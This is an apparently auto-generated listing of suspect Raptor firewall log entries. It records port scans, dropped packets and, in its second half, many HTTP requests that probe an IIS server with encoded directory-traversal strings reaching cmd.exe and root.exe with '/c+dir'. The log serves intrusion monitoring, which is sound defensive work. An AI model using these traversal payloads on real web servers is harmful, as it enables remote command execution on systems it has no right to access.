- Raptor firewall events that are potentially suspect.
- This listing was generated from sample-logfile.txt using RapTag v0.1d
- Jump to the Summary
|
|
| Dec 08 00:01:36.203 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 00:01:37.718 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 00:01:39.218 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 00:39:10.296 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (207.21.209.110 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 00:39:11.796 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (207.21.209.110 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 00:39:13.296 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (207.21.209.110 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 01:01:34.671 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.67.97.66 ->216.187.150.10: Protocol=TCP[SYN] 21->21 |
| Dec 08 01:01:34.672 your_firewall_name [102]: 226 IP packet dropped (64.67.97.66 ->216.187.150.10 : Protocol=TCP[SYN] 21->21: Restricted Port: Protocol=TCP[SYN] Port 21->21 (received on interface 216.187.150.10) |
| Dec 08 01:01:34.684 your_firewall_name [102]: 226 IP packet dropped (64.67.97.66 ->192.168.10.15 : Protocol=TCP[SYN] 21->21: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 02:13:29.406 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:13:30.906 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:13:32.406 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (138.250.100.31 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:39:41.968 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (132.183.24.86 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:39:43.453 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (132.183.24.86 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:39:44.953 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (132.183.24.86 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 02:48:04.937 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->216.187.150.10 : Protocol=TCP[SYN] 1043->3128: Restricted Port: Protocol=TCP[SYN] Port 1043->3128 (received on interface 216.187.150.10) |
| Dec 08 02:48:04.994 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->192.168.10.15 : Protocol=TCP[SYN] 1048->3128: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 02:48:06.234 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->192.168.10.15 : Protocol=TCP[SYN] 1048->3128: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 02:48:06.238 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->216.187.150.10 : Protocol=TCP[SYN] 1043->3128: Restricted Port: Protocol=TCP[SYN] Port 1043->3128 (received on interface 216.187.150.10) |
| Dec 08 02:48:07.453 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->192.168.10.15 : Protocol=TCP[SYN] 1048->3128: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 02:48:07.461 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->216.187.150.10 : Protocol=TCP[SYN] 1043->3128: Restricted Port: Protocol=TCP[SYN] Port 1043->3128 (received on interface 216.187.150.10) |
| Dec 08 02:48:08.828 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->192.168.10.15 : Protocol=TCP[SYN] 1048->3128: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 02:48:08.831 your_firewall_name [102]: 226 IP packet dropped (192.168.10.62 ->216.187.150.10 : Protocol=TCP[SYN] 1043->3128: Restricted Port: Protocol=TCP[SYN] Port 1043->3128 (received on interface 216.187.150.10) |
| Dec 08 03:03:01.343 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (65.29.220.211 ->216.187.150.10: Protocol=TCP[SYN] 4481->515 |
| Dec 08 03:03:01.344 your_firewall_name [102]: 226 IP packet dropped (65.29.220.211 ->216.187.150.10 : Protocol=TCP[SYN] 4481->515: Restricted Port: Protocol=TCP[SYN] Port 4481->515 (received on interface 216.187.150.10) |
| Dec 08 03:31:55.234 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.108.69.36 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 03:31:56.734 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.108.69.36 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 03:31:58.234 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (63.108.69.36 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 03:32:19.343 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (205.158.142.75 ->216.187.150.10: Protocol=UDP 39706->137 |
| Dec 08 03:32:20.828 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (205.158.142.75 ->216.187.150.10: Protocol=UDP 39706->137 |
| Dec 08 03:32:22.328 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (205.158.142.75 ->216.187.150.10: Protocol=UDP 39706->137 |
| Dec 08 04:41:47.703 your_firewall_name [102]: 226 IP packet dropped (208.7.221.70 ->192.168.10.15 : Protocol=TCP[SYN] 3072->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 04:41:48.341 your_firewall_name [102]: 226 IP packet dropped (208.7.221.70 ->192.168.10.15 : Protocol=TCP[SYN] 3072->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 04:41:49.000 your_firewall_name [102]: 226 IP packet dropped (208.7.221.70 ->192.168.10.15 : Protocol=TCP[SYN] 3072->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 05:11:34.343 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 51858->137 |
| Dec 08 05:11:35.859 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 51858->137 |
| Dec 08 05:11:37.328 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 51858->137 |
| Dec 08 05:18:31.156 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (137.78.104.70 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 05:18:32.656 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (137.78.104.70 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 05:18:34.156 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (137.78.104.70 ->216.187.150.10: Protocol=UDP 137->137 |
| Dec 08 07:34:43.140 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 64255->137 |
| Dec 08 07:34:44.625 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 64255->137 |
| Dec 08 07:34:46.125 your_firewall_name [102]: 347 Possible Port Scan detected on Interface 216.187.150.10 (64.122.6.210 ->216.187.150.10: Protocol=UDP 64255->137 |
| Dec 08 07:36:41.671 your_firewall_name smtp[280]: 218 smtpd: Invalid SMTP protocol: Sending system is not 8 bit clean in 'Subject: \367A\367\277\220\224\374\277Rk\370\277~window mediaindexclicktom's journalbibliography histclearreferences for geogquicktimeinstaller' from adsl-78-158-67.chs.bellsouth.net ([216.78.158.67]) |
| Dec 08 07:41:02.703 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->216.187.150.10 : Protocol=TCP[SYN] 4213->27374: Restricted Port: Protocol=TCP[SYN] Port 4213->27374 (received on interface 216.187.150.10) |
| Dec 08 07:41:03.471 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->216.187.150.10 : Protocol=TCP[SYN] 4213->27374: Restricted Port: Protocol=TCP[SYN] Port 4213->27374 (received on interface 216.187.150.10) |
| Dec 08 07:41:04.250 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->216.187.150.10 : Protocol=TCP[SYN] 4213->27374: Restricted Port: Protocol=TCP[SYN] Port 4213->27374 (received on interface 216.187.150.10) |
| Dec 08 07:41:04.473 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->192.168.10.15 : Protocol=TCP[SYN] 4218->27374: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 07:41:05.161 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->192.168.10.15 : Protocol=TCP[SYN] 4218->27374: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 07:41:05.843 your_firewall_name [102]: 226 IP packet dropped (216.209.143.64 ->192.168.10.15 : Protocol=TCP[SYN] 4218->27374: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 09:08:53.265 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:08:54.264 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:08:55.265 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:08:56.265 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:08:57.265 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:09:42.031 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:09:43.031 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:09:44.030 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:09:45.031 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:09:46.031 your_firewall_name [102]: 226 IP packet dropped (65.214.36.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:29:46.953 your_firewall_name [102]: 226 IP packet dropped (61.143.218.157 ->192.168.10.15 : Protocol=TCP[SYN] 3151->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 09:29:47.750 your_firewall_name [102]: 226 IP packet dropped (61.143.218.157 ->192.168.10.15 : Protocol=TCP[SYN] 3151->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 09:29:48.562 your_firewall_name [102]: 226 IP packet dropped (61.143.218.157 ->192.168.10.15 : Protocol=TCP[SYN] 3151->80: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 09:39:23.390 your_firewall_name [102]: 226 IP packet dropped (140.119.164.129 ->192.168.10.15 : Protocol=TCP[RST] 21->4542: Received as broadcast/multicast (received on interface 216.187.150.10) |
| Dec 08 09:44:23.265 your_firewall_name [102]: 226 IP packet dropped (216.200.130.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:44:24.265 your_firewall_name [102]: 226 IP packet dropped (216.200.130.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:44:25.265 your_firewall_name [102]: 226 IP packet dropped (216.200.130.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:44:26.265 your_firewall_name [102]: 226 IP packet dropped (216.200.130.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 09:44:27.265 your_firewall_name [102]: 226 IP packet dropped (216.200.130.7 ->216.187.150.10 : Protocol=UDP 53->0: Bad IP Header (received on interface 216.187.150.10) |
| Dec 08 10:17:37.875 your_firewall_name httpd[214]: 121 Statistics: duration=2.15 id=5TYjl sent=72 rcvd=441 srcif=Vpn3 src=216.187.75.219 /1859 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:37.927 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjn sent=70 rcvd=439 srcif=Vpn3 src=216.187.75.219 /2034 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/MSADC/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:37.980 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjp sent=80 rcvd=449 srcif=Vpn3 src=216.187.75.219 /2037 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/c/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.033 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjr sent=80 rcvd=449 srcif=Vpn3 src=216.187.75.219 /2040 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.087 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjt sent=96 rcvd=463 srcif=Vpn3 src=216.187.75.219 /2045 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.168 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjv sent=117 rcvd=480 srcif=Vpn3 src=216.187.75.219 /2049 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.222 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjx sent=117 rcvd=480 srcif=Vpn3 src=216.187.75.219 /2056 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.277 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjz sent=145 rcvd=496 srcif=Vpn3 src=216.187.75.219 /2061 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.331 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjB sent=97 rcvd=462 srcif=Vpn3 src=216.187.75.219 /2065 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.387 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjD sent=97 rcvd=462 srcif=Vpn3 src=216.187.75.219 /2068 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.446 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjF sent=97 rcvd=462 srcif=Vpn3 src=216.187.75.219 /2075 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.499 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjH sent=97 rcvd=462 srcif=Vpn3 src=216.187.75.219 /2078 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:38.554 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjJ sent=98 rcvd=448 srcif=Vpn3 src=216.187.75.219 /2081 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 10:17:42.050 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjN sent=96 rcvd=448 srcif=Vpn3 src=216.187.75.219 /2421 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 10:17:42.104 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjP sent=100 rcvd=463 srcif=Vpn3 src=216.187.75.219 /2428 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 10:17:42.157 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYjR sent=96 rcvd=463 srcif=Vpn3 src=216.187.75.219 /2432 srcname=216.187.75.219.novustelecom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:51.729 your_firewall_name httpd[214]: 121 Statistics: duration=0.30 id=5TYkU sent=72 rcvd=441 srcif=Vpn3 src=216.10.47.16 /1466 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:51.983 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYkW sent=70 rcvd=439 srcif=Vpn3 src=216.10.47.16 /1510 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/MSADC/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:52.228 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYkY sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /1540 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/c/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:52.476 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYl0 sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /1562 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:52.721 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYl2 sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1591 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:52.975 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYl4 sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /1614 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:53.219 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYl6 sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /1643 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:53.468 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYl8 sent=145 rcvd=496 srcif=Vpn3 src=216.10.47.16 /1676 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:53.713 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYla sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1701 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:53.963 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlc sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1728 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:54.232 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYle sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1754 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:54.476 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlg sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /1789 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:54.721 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYli sent=98 rcvd=448 srcif=Vpn3 src=216.10.47.16 /1824 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:01:54.972 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlk sent=96 rcvd=448 srcif=Vpn3 src=216.10.47.16 /1866 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir result="400 Bad Request" proto=http rule=34 |
| Dec 08 11:01:55.230 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlm sent=100 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1895 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:55.476 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlo sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /1932 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:55.636 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlq sent=72 rcvd=441 srcif=Vpn3 src=216.10.47.16 /1958 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:55.890 your_firewall_name httpd[214]: 121 Statistics: duration=0.01 id=5TYls sent=70 rcvd=439 srcif=Vpn3 src=216.10.47.16 /1988 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/MSADC/root.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:56.151 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlu sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /2020 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/c/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:56.476 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlw sent=80 rcvd=449 srcif=Vpn3 src=216.10.47.16 /2046 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/d/winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:56.769 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYly sent=96 rcvd=463 srcif=Vpn3 src=216.10.47.16 /2081 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:57.052 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlA sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /2106 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:57.296 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlC sent=117 rcvd=480 srcif=Vpn3 src=216.10.47.16 /2136 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:57.556 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlE sent=145 rcvd=496 srcif=Vpn3 src=216.10.47.16 /2157 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:57.802 your_firewall_name httpd[214]: 121 Statistics: duration=0.00 id=5TYlG sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /2182 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:58.168 your_firewall_name httpd[214]: 121 Statistics: duration=0.12 id=5TYlI sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /2207 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
| Dec 08 11:01:58.540 your_firewall_name httpd[214]: 121 Statistics: duration=0.10 id=5TYlK sent=97 rcvd=462 srcif=Vpn3 src=216.10.47.16 /2256 srcname=odin.coloc.evcom.net dstif=Vpn4 dst=192.168.10.222/80 op=GET arg=http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir result="404 Not Found" proto=http rule=34 |
